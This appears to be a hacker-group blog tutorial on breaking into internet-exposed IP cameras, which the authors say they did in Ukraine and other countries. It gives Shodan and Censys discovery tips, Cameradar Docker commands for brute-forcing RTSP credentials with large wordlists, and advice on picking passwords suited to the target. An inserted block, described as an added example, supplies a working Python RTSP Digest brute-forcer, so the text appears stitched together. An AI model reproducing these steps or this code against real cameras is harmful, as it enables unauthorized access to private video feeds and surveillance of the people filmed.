CyberMorans
As you may know, we have played some OSINT roles for Ukraine since the invasion began. One of these roles is hacking IP cameras throughout the country. In this way, we can spy on Russian activities and war crimes. We did this at the request of the Ukrainian Army starting in February 2022.
To hack these cameras we use multiple methods and techniques. In hacking, always explore multiple methods to be successful. -- Persistence is a key hacker trait --
As a hacker, it is important to take a strategic approach to any target. Always use the simplest methods first before progressing to more advanced attack methods.
As a first step, we identified the unprotected cameras using sites such as Shodan, Google Dorks, and Censys. Then, we tried default credentials. These default credentials vary by camera and manufacturer, but that technique resulted in pwning a few cameras.
Next, we tried to hack the cameras with weak passwords. This produced far more successful results! The primary tool used is Cameradar.
In this tutorial, I will show you how to use Cameradar for IP camera hacking just like we did!
Real Time Streaming Protocol: RTSP
RTSP is the protocol that most of these IP cameras use. Not all of the cameras use RTSP, but the vast majority do. Before proceeding, note that cameras using proprietary or other protocols will not be attackable with cameradar.
RTSP is an application-layer protocol for commanding streaming media servers: it carries requests such as play and pause and so acts as a network remote control for time-synchronized streams of continuous media, such as audio and video. It does not transmit the media itself. The audio and video travel separately, usually over RTP, while RTSP talks to the server that streams them. -- When a user pauses a video they are streaming, RTSP conveys the pause request to the video streaming server --
Like HTTP, RTSP is text-based and normally runs over a persistent TCP connection (port 554 by default). While most RTSP messages are sent by the client to the server, some commands travel in the other direction.
RTSP commands
The methods used when negotiating and controlling media transmissions (most are sent from the client to the server):
- OPTIONS: determines which other methods the media server will accept.
- DESCRIBE: asks the server to describe the presentation at the given URL, i.e. which media streams it contains and their types, normally returned as SDP.
- ANNOUNCE: describes the presentation when sent from the client to the server, and updates the description when sent from the server to the client.
- SETUP: specifies how a media stream must be transported before a PLAY request is sent.
- PLAY: starts the media transmission by telling the server to begin sending data.
- PAUSE: temporarily halts stream delivery.
- RECORD: initiates a media recording.
- TEARDOWN: terminates the session entirely and stops all media streams.
- REDIRECT: informs the client that it must connect to another server, by providing a new URL for the client to issue requests to.
Other RTSP request types are GET_PARAMETER and SET_PARAMETER; the protocol also defines embedded (interleaved) binary data, a way of carrying media inside the RTSP connection itself.
Now, you are ready to start cracking IP cameras!
Download and Install cameradar
Cameradar can be run natively in Linux, but it works best in a docker container.
First, install docker. On Kali (and Debian) the package is called docker.io; the package named docker is an unrelated system-tray utility:
kali > sudo apt install docker.io
Next, start docker with the systemctl command:
kali > sudo systemctl start docker
Now, download cameradar. This step is optional, since the docker image is pulled automatically the first time you run it, but the repository contains the dictionaries folder, including the credentials.json file the tool reads by default, which is useful as a template later:
kali > git clone https://github.com/Ullaakut/cameradar
Now, let's brute-force some IP cameras!
Run the RTSP Credential Brute-forcer
Now that you have docker and cameradar installed, you only need to point cameradar at the IP address of the camera that you want to brute-force. For instance, to brute-force a camera at 192.168.1.101, we would run:
kali > sudo docker run ullaakut/cameradar -t 192.168.1.101
Cameradar will now attempt to find an RTSP stream on one of the default RTSP ports, namely 554, 5554 and 8554. If you suspect there may be RTSP streams on other ports -- you may want to run an nmap scan first -- you can give them to the -p switch as a comma-separated list (include the defaults too if you still want those scanned):
kali > sudo docker run ullaakut/cameradar -t 192.168.1.101 -p 9554
Use Custom Username & Password Lists
By default, cameradar uses a small list of the most common usernames and passwords. It's a good strategy to try these first, but if they are unsuccessful, it's time to think outside the box!
This means larger and more appropriate username and password lists -- I personally like seclists --. However, from experience hacking cameras in Ukraine, Mexico, Syria, Sudan and Russia, the usernames are usually simple, such as admin, root, admin1, admin3, etc. This means that you can probably use the default username list, but passwords do vary.
That's why you should use a good password list that is appropriate for your environment and/or the context of your target -- e.g. a Spanish list in a Spanish-speaking nation, or the equivalent for a church, mosque, military, political party, etc.
First, the credential list MUST be in the JSON format cameradar expects: not a bare array of strings, but an object with a "usernames" array and a "passwords" array, exactly the shape of dictionaries/credentials.json in the cameradar repository. There are several websites that will convert a text file to JSON for free, such as https://anyconv.com/txt-to-json-converter/, and your .txt file will come back with a .json extension, but check that its structure matches that schema (and add the "usernames" array, since the -c file replaces both lists) before pointing cameradar at it. So, if we were using the seclists password list
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
we would first convert it to that JSON structure and then use the resulting file, 10-million-password-list-top-1000000.json, with cameradar. To use that password list with cameradar, run:
kali > sudo docker run -t -v /usr/share/seclists/Passwords/Common-Credentials:/tmp/dictionaries \
           ullaakut/cameradar \
           -c "/tmp/dictionaries/10-million-password-list-top-1000000.json" \
           -t 192.168.1.101
Note the ordering: -v is a docker option, so it must come before the image name, and the path given to -c is the path inside the container (under /tmp/dictionaries), not the path on the host. The first -t is docker's tty flag; the second is cameradar's target.
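The exchange the RTSP section above describes, and the dictionary loop the command above runs, as an added example in Python (not code from this post or from the cameradar project): a DESCRIBE request, the camera's 401 Digest challenge, the client's answer, and a loop over a credentials file in the JSON shape cameradar's -c flag reads. The fake camera, its realm and nonce, the wordlist, the route stream1 and the credential admin/camera1 are all constructed for the example.

```python
"""cameradar-style RTSP Digest credential check against a constructed fake camera (added example)."""
import hashlib
import json
import re
import socket
import threading

REALM, NONCE = "IPCam", "0a1b2c3d"  # constructed; a real camera sends a fresh nonce per challenge
WORDLIST_TXT = "123456\npassword\nadmin\ncamera1\n12345678\n"  # constructed text wordlist

def build_credentials_json(wordlist_text, usernames):
    # cameradar's -c file is {"usernames": [...], "passwords": [...]} (its credentials.json shape)
    passwords = [line for line in wordlist_text.splitlines() if line]
    return json.dumps({"usernames": list(usernames), "passwords": passwords}, indent=2)

def build_request(method, url, cseq, headers=None):
    # RTSP/1.0 request: start line, CSeq, extra headers, blank line (HTTP-like text framing)
    lines = [f"{method} {url} RTSP/1.0", f"CSeq: {cseq}"]
    lines += [f"{k}: {v}" for k, v in (headers or {}).items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()

def read_message(sock):
    # Read one message up to the blank line -> (start line, lower-cased headers); bodies not needed
    buf = b""
    while b"\r\n\r\n" not in buf and (chunk := sock.recv(4096)):
        buf += chunk
    lines = buf.partition(b"\r\n\r\n")[0].decode(errors="replace").split("\r\n")
    headers = {n.strip().lower(): v.strip() for n, _, v in (h.partition(":") for h in lines[1:])}
    return lines[0], headers

def auth_params(value):
    # key="value" pairs of a WWW-Authenticate or Authorization header
    return dict(re.findall(r'(\w+)="([^"]*)"', value))

def digest_response(user, password, method, url, realm, nonce):
    # RFC 2617 Digest without qop, which is what most cameras speak: MD5(HA1:nonce:HA2)
    ha1 = hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{url}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()

def try_credential(host, port, route, user, password):
    # One attack round: DESCRIBE, take the 401 challenge, answer it. True on 200 OK.
    url = f"rtsp://{host}:{port}/{route}"
    with socket.create_connection((host, port), timeout=3) as sock:
        sock.sendall(build_request("DESCRIBE", url, 1, {"Accept": "application/sdp"}))
        status, headers = read_message(sock)
        if status.startswith("RTSP/1.0 200"):
            return True  # the stream needs no credentials at all
        chal = auth_params(headers.get("www-authenticate", ""))
        if not status.startswith("RTSP/1.0 401") or "nonce" not in chal:
            return False  # refused for another reason (404 route, Basic-only camera, ...)
        resp = digest_response(user, password, "DESCRIBE", url, chal["realm"], chal["nonce"])
        authz = (f'Digest username="{user}", realm="{chal["realm"]}", '
                 f'nonce="{chal["nonce"]}", uri="{url}", response="{resp}"')
        sock.sendall(build_request("DESCRIBE", url, 2,
                                   {"Accept": "application/sdp", "Authorization": authz}))
        return read_message(sock)[0].startswith("RTSP/1.0 200")

def brute_force(host, port, route, credentials_json):
    # cameradar-style loop over every username/password pair; returns (user, password) or None
    creds = json.loads(credentials_json)
    for user in creds["usernames"]:
        for password in creds["passwords"]:
            if try_credential(host, port, route, user, password):
                return user, password
    return None

def start_fake_camera(user, password):
    # Constructed stand-in for a camera: Digest-protected DESCRIBE, no lockout, no delay.
    listener = socket.create_server(("127.0.0.1", 0))

    def serve(conn):
        with conn:
            while (msg := read_message(conn))[0]:  # empty start line: client closed
                req_line, headers = msg
                method, url, _ = req_line.split(" ", 2)
                cseq = headers.get("cseq", "0")
                given = auth_params(headers.get("authorization", ""))
                expected = digest_response(user, password, method, url, REALM, NONCE)
                if given.get("username") == user and given.get("response") == expected:
                    reply = f"RTSP/1.0 200 OK\r\nCSeq: {cseq}\r\n\r\n"  # SDP body omitted
                else:  # wrong or missing credential: challenge again, however many times
                    reply = (f"RTSP/1.0 401 Unauthorized\r\nCSeq: {cseq}\r\nWWW-Authenticate: "
                             f'Digest realm="{REALM}", nonce="{NONCE}"\r\n\r\n')
                conn.sendall(reply.encode())

    def accept_loop():
        while True:
            threading.Thread(target=serve, args=(listener.accept()[0],), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener.getsockname()[1]

if __name__ == "__main__":
    port = start_fake_camera("admin", "camera1")
    creds = build_credentials_json(WORDLIST_TXT, ["admin", "root"])
    print(brute_force("127.0.0.1", port, "stream1", creds))  # ('admin', 'camera1')
```

Run directly, it prints ('admin', 'camera1') after four connections, none of which the fake camera slows down or refuses; that absence of lockout is exactly what a dictionary run against RTSP relies on. Against a real camera, digest_response would also need the qop="auth" variant (cnonce and nc fields), and a Basic challenge would need a base64 Authorization header instead; both are left out here to keep the exchange readable.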
This is easier than it seems...
Once you become familiar with the RTSP protocol, password cracking of IP camera credentials follows the same process as other remote password-cracking techniques. In fact, it may even be easier: RTSP itself has no lockout mechanism, and most camera firmware imposes no limit or delay on failed authentication attempts, so a dictionary run can go as fast as the network allows. With cameradar, we were able to gain access to a significant number of IP cameras that had weak passwords.
Conclusion
Subscribe to receive notifications of similar posts, where we will be reverse engineering malware and vulnerabilities, as well as covering hacking vectors, stories, tutorials and other infosec stuff...
Follow me on Twitter for daily infosec memes and shenanigans.
Morans,
Thank you for taking the time; I hope you learned something new. Like and leave a comment/review and, as always, stay awesome!